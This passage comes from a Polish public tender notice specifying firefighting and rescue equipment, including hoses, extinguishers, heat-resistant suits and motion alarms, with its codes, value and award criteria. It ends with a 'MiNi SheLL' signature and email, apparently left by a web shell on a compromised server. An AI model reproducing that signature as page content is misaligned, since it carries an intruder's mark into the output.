minimum 24 miesiące- sondy do anemometru HD 2103.2 firmy MERA lub równorzędne:- sonda termiczna o zakresie 0,1...40m/s, - 25...+800C (AP47151);- sonda wiatraczkowa o zakresie 0,6...25m/s, - 25...+800C, ?100mm (AP47251);- sonda do powietrza wyposażona w moduł SICRAM o zakresie - 50...+2500C, L=230mm, ?4 mm, t99=12s (TP475A.0)- uchwyt teleskopowy L=220...870mm (AST.1)- sorbent sypki, mineralny:- powinien pochłaniać: kwasy, zasady, rozpuszczalniki, produkty ropopochodne oraz wodę,- powinien być niepalny i niewybuchowy,- powinien posiadać nieograniczony termin przydatności- powinien posiadać świadectwo dopuszczenia CNBOP-PIB - spodnie antyprzecięciowe dla pilarzy:- zgodność z norma EN 381-5 klasa 1 (20m/s)- nieduża waga,- powinny być wykonane z materiału rozciągliwego ze zwiększoną odpornością na wodę i zabrudzenia,- powinien posiadać kieszenie boczne, tylną kieszeń wyposażoną w klapę oraz kieszenie na udzie na np. pilniki, klucze - preferowany kolor czerwony z czarnym materiałem wzmacniającym na przodzie nóg,- powinny być zapinane na zamek błyskawiczny.spodnie należy dostarczyć w rozmiarze: XL - wzrost 180-188cm, obwód pasa 98-106 cm- sygnalizator bezruchu z czujnikiem temperatury:- spełniający wymagania WTU (Dz. U. Nr 143, poz. 1004),- sygnalizator powinien posiadać funkcję ,,automatycznego włączania" się,- alarm wstępnego (zredukowany poziom hałasu) rozpoczyna się po 25 s bezruchu,- alarm główny - 8 do 9 sekund,- obudowa trwała odporna na wysokie temperatury i uderzenia,- sygnał alarmowy w zakresie 95 Dba,- czujnik ruchu-akcelerator półprzewodnikowy,- zasilanie - bateria powinna zapewnić pracę do 300 godzin w trybie wykrywania, - rok produkcji - 2017,- gwarancja minimum 24 miesiące,- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- świeca zapłonowa do piły MS 250 lub równorzędnej:- świeca zapłonowa do piły MS 290 lub równorzędnej:- tarcza ścierna 145mmx3mmx22mmdo ostrzałki elektrycznej łańcuchów pił łańcuchowych- torba na maskę typu AUER ULTRA ELITE do aparatu powietrznego lub równorzędną:- ubranie do usuwania owadów niebezpiecznych:rozmiar XL wzrost 176-180 cm, obwód klatki piersiowej 100 - 106 cm, obwód pasa 100-108 cm - ubranie powinno być wykonane z trzech warstw. Dwie warstwy z tkaniny, a jedna z pianki. - tkanina zewnętrzna nie może dotykać bezpośrednio ciała osoby ubranej w ubranie- ochrona głowy powinna być przypinana do całości ubrania suwakiem w taki sposób, aby umożliwić pracę również w hełmie strażackim.- dodatkowo połączenie kaptura z ubraniem powinno być uszczelnione przy pomocy kołnierza zapinanego na rzep. - rękawy i nogawki powinny być zakończone ściągaczem oraz paskiem ściągającym zapinanym na rzep.- ubranie żaroodporne 4 -ro częściowe:Ubranie powinno spełniać wymagania bezpieczeństwa i ochrony zdrowia zawarte w Dyrektywie 89/686/EWG Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 31 marca 2003 roku w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz. U. Nr 80, poz. 725)- zgodność z normą PN-EN 531:1999 i PN-EN 1486:2001- części składowe: - bluza z kapturem i miejscem na aparat powietrzny,- spodnie,- osłona obuwia.- rękawice- rozmiar średni 176 cm - 182 cm.Całość powinna być zapakowana w torbę z tkaniny szklanej, metalizowanej z uchwytami do przenoszenia- wąż tłoczny ? 52 długość 20 m do motopompy: powinien spełniać wymagania określone w WTU (Wymagania Techniczno Użytkowe) określone w rozporządzeniu MSW i A z dnia 20 czerwca 2007r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U Nr 143 poz. 1002) zał. Nr 2 Wymagania Techniczno Użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzonych do użytkowania w jednostkach ochrony przeciwpożarowej oraz wykorzystywanych przez te jednostki do alarmowania o pożarze lub innym zagrożeniu oraz do prowadzenia działań ratowniczych, także wyrobów stanowiących podręczny sprzęt gaśniczy pkt. 3.2.- długość 20 m z zatamowanymi łącznikami aluminiowymi, - oplot 100% z przędzy poliestrowej, - wkładka wewnętrzna z gumy syntetycznej lub innego materiału spełniającego warunki normy,- zakres użytkowania mieszczący się w przedziale od -40°C do + 70°C, - ciśnienie robocze min. 15 bar, - rok produkcji węża - 2017,- gwarancja minimum 24 miesiące - wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- wąż tłoczny ? 75 długość 20 m do motopompy: z łącznikami, powinien spełniać wymagania określone w WTU (Dz. U. Nr 143 poz. 1002 Zał. 2 pkt. 3.2) - długość 20 m z zatamowanymi łącznikami aluminiowymi, - oplot 100% z przędzy poliestrowej, - wkładka wewnętrzna z PCV lub innego materiału spełniającego warunki normy,- zakres użytkowania mieszczący się w przedziale od -40°C do + 70°C, - ciśnienie robocze min. 15 bar, - masa węża z łącznikami do 9,5 kg- rok produkcji węża - 2017,- gwarancja minimum 24 miesiące- wymagane" świadectwo dopuszczenia CNBOP-PIB".- wąż wysokociśnieniowy 700 bar długości 10 m:Kompatybilny ze sprzętem typu LUCAS lub równoważnym- na jednym końcu węża powinna być zamontowana nakrętka G  1/4  ze stożkiem 60 0 do bezpośredniego nakręcania tzw. ,,złączki męskiej",- na drugim końcu powinna być złączka ,,męska" G 1/4A z pierścieniem zacinającym do podłączenia do pompy LUCAS.- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- zawór kulowy ZK 52 do ,,szybkiego natarcia"- do zastosowania w samochodzie pożarniczym;- zgodny z normą PN-92/M-51029,- korpus i pokrywa powinna być wykonana ze stopów aluminium, kula z mosiądzu- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- zestaw ADR - podstawowy z sorbentem:w skład zestawu powinny wchodzić nw. elementy: kamizelka ostrzegawcza, rękawice ochronne - nitrylowe, gogle ochronne, maska ucieczkowa, filtropochłaniacz, osłona otworów kanalizacyjnych, latarka, łopata, płyn do płukania oczu, pojemnik do zbierania pozostałości, trójkąt ostrzegawczy, sorbent 5 l.Do zestawu należy dołączyć opcjonalnie - opryskiwacz ogrodowy 15 litrowy.- gaśnica proszkowa GP-2x ABC - wraz z wieszakiem: - musi spełniać wymagania określone przez producentów sprzętu zgodnie z obowiązującą normą PN-EN 3 oraz zgodnie z Dyrektywą Bezpieczeństwa PED 97/23/EC.- wyposażona w wskaźnik ciśnienia i zawór szybkootwieralny - do gaszenia pożarów grupy ABC, - zbiornik metalowy, bezszwowy, - skuteczność 13A 89B i C, - zakres gaszenia od -30 do + 60 0 C,- możliwość gaszenia urządzeń elektrycznych o napięciach do 1000 V, - czynnik napędowy azot, - ciśnienie robocze 1,6 Mpa, - możliwość wielokrotnego napełniania, - posiadająca znak bezpieczeństwa CE - rok produkcji gaśnicy - 2017,- gwarancja minimum 24 miesiące,- wymagane ,,świadectwo dopuszczenia CNBOP-PIB" .- gaśnica proszkowa GP-6x ABC: - musi spełniać wymagania określone przez producentów sprzętu zgodnie z obowiązującą normą PN-EN 3 oraz zgodnie z Dyrektywą Bezpieczeństwa PED 97/23/EC.- wyposażona w wskaźnik ciśnienia i zawór szybkootwieralny - do gaszenia pożarów grupy ABC, - zbiornik metalowy, bezszwowy, - skuteczność 43A 233B i C, - zakres gaszenia od -30 do + 60 0 C,- możliwość gaszenia urządzeń elektrycznych o napięciach do 1000 V, - czynnik napędowy azot, - ciśnienie robocze 1,6 Mpa, - możliwość wielokrotnego napełniania, - posiadająca znak bezpieczeństwa CE - rok produkcji gaśnicy - 2017,- gwarancja minimum 24 miesiące,- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- gaśnica śniegowa GŚ-5xBC:Spełniająca wymagania normy EN 3 oraz Dyrektywy Bezpieczeństwa PED 97/23/EC- skuteczność 89 B, - masa środka - 5 kg,- czynnik roboczy CO2 ,- zawór wyposażony w bezpiecznik ciśnienia,- możliwość czasowego przerwania gaszenia- możliwość gaszenia urządzeń pod napięciem do 1 000 V,- możliwość gaszenia również pożarów typu C, - zakres temperatur stosowania od - 30 0 C do + 60 0 C - rok produkcji - 2017,- gwarancja minimum 24 miesiące,- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- koc gaśniczy z tkaniny szklanej z pokrowcem: o wym. 1,4 x 1,8 m wraz z futerałem, - zgodność z normą PN-EN 1866-1- wymagane świadectwo dopuszczenia CNBOP.- wąż hydrantowy ? 25 półsztywny, długość 30m:powinien spełniać wymagania określone normą PN-14540:2004 oraz WTU (Wymagania Techniczno Użytkowe) określone w rozporządzeniu MSW i A z dnia 20 czerwca 2007r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U Nr 143 poz. 1002) zał. Nr 2 Wymagania Techniczno Użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzonych do użytkowania w jednostkach ochrony przeciwpożarowej oraz wykorzystywanych przez te jednostki do alarmowania o pożarze lub innym zagrożeniu oraz do prowadzenia działań ratowniczych, także wyrobów stanowiących podręczny sprzęt gaśniczy pkt. 3.1.- wąż powinien być półsztywny z zatamowanymi łącznikami aluminiowymi,- oplot poliestrowy - 100% przędzy poliestrowej,- wkładka wewnętrzna z gumy syntetycznej lub innego materiału spełniającego warunki normy,- zakres użytkowania mieszczący się w przedziale od -20°C do + 70°C, - ciśnienie robocze min. 15 bar, - rok produkcji 2017,- gwarancja minimum 24 miesiące.- wąż hydrantowy z łącznikami ? 52 płasko składany długość 20 m:powinien spełniać wymagania określone normą PN-14540:2004 oraz WTU (Dz. U Nr 143 poz. 1002 zał. Nr 2 pkt. 3.1.)- wąż powinien być płasko składany z zatamowanymi łącznikami aluminiowymi,- oplot poliestrowy - 100% przędzy poliestrowej,- wkładka wewnętrzna z PCV lub innego materiału spełniającego warunki normy,- zakres użytkowania mieszczący się w przedziale od -20°C do + 70°C, - ciśnienie robocze min. 15 bar, - rok produkcji - 2017,- gwarancja minimum 24 miesiące,- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>35811100-3, 35111520-6, 35111520-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 190447,0<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin realizacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com